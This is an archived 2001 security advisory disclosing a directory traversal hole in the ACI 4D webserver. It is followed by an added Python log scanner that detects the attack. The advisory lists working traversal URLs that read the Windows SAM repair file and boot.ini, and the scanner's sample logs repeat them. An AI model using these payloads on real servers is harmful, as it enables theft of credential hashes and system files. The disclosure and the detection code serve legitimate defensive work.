From: KRFinisterre checkfree.com
Date: Mon Aug 20 2001 - 09:51:00 CDT
----- Forwarded by Kevin R Finisterre/OH/CheckFree on 08/20/2001 10:43 AM -----
From: KF <dotslash snosoft.com>
Sent by: elguapo clmboh1-smtp3.columbus.rr.com
To: sales 4D.com, recon snosoft.com
cc:
Subject: I have found a security hole in your product...
Date: 08/18/2001 09:39 PM

vendor: http://www.4d.com/
current version: 6.7
tested version: 6.57, others?

This directory traversal hole seems to work on
ACI 4D webserver running on the NT platform. I would imagine
exploitation on a Mac OS box would be similar but would require
the proper Mac filesystem path to the file you wish to view.

Server: ACI-4D/6.57
http://host + one of the following URLs:
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
-KF
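
Added example (not part of the original advisory, and not 4D or Neohapsis code): a log check that flags requests matching the URL patterns listed above, i.e. a /4DBin/_/ prefix followed by a drive letter or a ".." segment. The Common Log Format input, the handling of percent-encoded variants, and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a Common Log Format entry: "GET /path HTTP/1.0"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
PREFIX = "/4dbin/_/"  # prefix shared by every URL in the advisory

def is_4dbin_traversal(target: str) -> bool:
    """True if a request target matches the advisory's /4DBin/_/ patterns."""
    path = urlsplit(target).path
    # Decode percent-escapes twice so %2e%2e and %252e%252e are also seen
    # (encoded variants are an assumption; the advisory lists plain URLs only).
    for _ in range(2):
        path = unquote(path)
    path = path.replace("\\", "/").lower()
    if not path.startswith(PREFIX):
        return False
    segments = path[len(PREFIX):].split("/")
    has_dotdot = ".." in segments                            # /4DBin/_/../boot.ini
    has_drive = bool(re.fullmatch(r"[a-z]:", segments[0]))   # /4DBin/_/C:/...
    return has_dotdot or has_drive

def scan(log_lines):
    """Return (client, target) for each log line that matches."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_4dbin_traversal(m.group(1)):
            hits.append((line.split()[0], m.group(1)))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic);
# the logo.gif request is a hypothetical benign path under the same prefix.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2001:09:51:00 -0500] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.44 - - [20/Aug/2001:09:52:10 -0500] "GET /4DBin/_/../boot.ini HTTP/1.0" 200 288',
    '192.0.2.44 - - [20/Aug/2001:09:52:30 -0500] "GET /4DBin/_/C:/inetpub/../boot.ini HTTP/1.0" 200 288',
    '192.0.2.44 - - [20/Aug/2001:09:52:41 -0500] "GET /4DBin/_/%2e%2e/boot.ini HTTP/1.0" 200 288',
    '192.0.2.10 - - [20/Aug/2001:09:53:02 -0500] "GET /4DBin/_/images/logo.gif HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(f"possible 4D traversal request from {client}: {target}")
```

A 200 status on a flagged line means the server answered the request, so those entries are the ones to review first.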